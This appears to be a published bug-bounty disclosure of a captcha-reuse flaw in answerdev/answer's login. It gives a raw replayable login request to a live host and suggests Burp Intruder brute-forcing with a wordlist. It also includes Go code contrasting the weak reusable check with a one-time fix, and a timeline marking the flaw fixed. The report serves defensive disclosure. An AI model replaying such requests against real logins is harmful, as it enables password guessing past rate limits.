Captcha Bypass on login in answerdev/answer

Valid

Reported on

Feb 21st 2023


Description

If we log in incorrectly multiple times, a captcha is required. Each captcha has a "captcha_id" and a solution, the "captcha_code". For example: "captcha_code":"8awt" "captcha_id":"7nToXDrT6SkJ2BJxKG1u". The same captcha_code and captcha_id can be reused in login requests without any problem.

The captcha is generated by: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Proof of Concept

Attempt to log in multiple times and get any captcha. Captcha URL: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Type the captcha code and log in.

Your request:

POST /answer/api/v1/user/login/email HTTP/1.1
Host: 34.245.133.152:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 
Content-Type: application/json
Content-Length: 105
Origin: http://34.245.133.152:9080
Connection: close
Referer: http://34.245.133.152:9080/users/login

{"e_mail":"sdad@gmail.com","pass":"sdadssadda","captcha_code":"8awt","captcha_id":"7nToXDrT6SkJ2BJxKG1u"}
----------------------------------------------------------------

This request can be replayed as many times as you want with the same captcha_code and the same captcha_id.

Response you will get each time:
----------------------------------------------------------------
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Date: Tue, 21 Feb 2023 12:44:12 GMT
Content-Length: 186
Connection: close

{"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}

You can use Burp Suite, send the request to Intruder, add a wordlist and check with 1000 requests. The result will be the same.

Impact

The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a "captcha_code", which is the code the user must enter to prove they are human, and a "captcha_id", which is a unique identifier for that particular captcha. Once an attacker solves one captcha, they can reuse the same "captcha_code" and "captcha_id" for all subsequent login attempts, so the captcha no longer limits password guessing.
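The root cause is that a verified captcha stays valid in the server's store. Below is an added illustration (not answerdev/answer's code, and not the fix in commit 813ad0): an in-memory captcha store with the weak check beside a hardened one that consumes the captcha_id on its first verification, whether or not the code matches. The store type and method names are assumptions for this example.

```go
package main

import (
	"sync"
	"time"
)

// captchaEntry is one issued captcha: the expected code and when it expires.
type captchaEntry struct {
	code    string
	expires time.Time
}

// CaptchaStore keeps issued captchas keyed by captcha_id (in memory for this example).
type CaptchaStore struct {
	mu      sync.Mutex
	entries map[string]captchaEntry
}

func NewCaptchaStore() *CaptchaStore {
	return &CaptchaStore{entries: map[string]captchaEntry{}}
}

// Issue stores a captcha_id/captcha_code pair with a lifetime.
func (s *CaptchaStore) Issue(id, code string, ttl time.Duration) {
	s.mu.Lock()
	defer s.mu.Unlock()
	s.entries[id] = captchaEntry{code: code, expires: time.Now().Add(ttl)}
}

// VerifyReusable is the weak pattern the report describes: the code is checked
// but the entry stays in the store, so one solved pair passes on every attempt.
func (s *CaptchaStore) VerifyReusable(id, code string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	e, ok := s.entries[id]
	return ok && time.Now().Before(e.expires) && e.code == code
}

// VerifyOnce is the hardened form: the entry is removed on the first check,
// whether or not the code matches, so a solved captcha backs one attempt only.
func (s *CaptchaStore) VerifyOnce(id, code string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	e, ok := s.entries[id]
	if !ok {
		return false
	}
	delete(s.entries, id)
	return time.Now().Before(e.expires) && e.code == code
}
```

The login handler should call the one-time check before comparing credentials and require a fresh captcha on the next attempt regardless of whether the password was correct.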

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago
hatlesswizard modified the report 3 months ago
hatlesswizard modified the report 3 months ago
joyqi validated this vulnerability 2 months ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
joyqi marked this as fixed in 1.0.6 with commit 813ad0 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
joyqi published this vulnerability 2 months ago